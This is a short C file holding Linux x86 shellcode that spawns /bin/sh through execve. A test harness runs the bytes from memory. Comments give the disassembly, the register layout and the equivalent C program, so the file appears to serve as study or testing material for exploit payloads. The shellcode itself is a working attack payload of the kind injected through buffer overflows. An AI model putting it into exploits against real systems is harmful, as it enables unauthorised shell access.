#include <stdio.h>
#include <stdlib.h>

u_char c0de[] =
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
	"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
	"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

main()
{
  void (*sc)() = (void *)c0de;
  printf("%d bytes\n", strlen(c0de));
  sc();
}

/* Notes
 804839b:       eb 1f                   jmp    80483bc <fff>

0804839d <ggg>:
 804839d:       5e                      pop    %esi
 804839e:       89 76 08                mov    %esi,0x8(%esi)
 80483a1:       31 c0                   xor    %eax,%eax
 80483a3:       89 46 0c                mov    %eax,0xc(%esi)
 80483a6:       88 46 07                mov    %al,0x7(%esi)
 80483a9:       b0 0b                   mov    $0xb,%al
 80483ab:       89 f3                   mov    %esi,%ebx
 80483ad:       8d 4e 08                lea    0x8(%esi),%ecx
 80483b0:       8d 56 0c                lea    0xc(%esi),%edx
 80483b3:       cd 80                   int    $0x80
 80483b5:       31 db                   xor    %ebx,%ebx
 80483b7:       89 d8                   mov    %ebx,%eax
 80483b9:       40                      inc    %eax
 80483ba:       cd 80                   int    $0x80

080483bc <fff>:
 80483bc:       e8 dc ff ff ff          call   804839d <ggg>
*/
/*
// status of %esi:
//
//  / b i n / s h 0  [adr of /bin/sh]  [adr of env (0)]
//  0 1 2 3 4 5 6 7     8  9  A  B        C  D  E  F
//
*/
/*
#include <stdio.h>

int main()
{
char *sh[]={"/bin/sh",NULL};
execve(*sh,sh,NULL);
_exit(0);
}
*/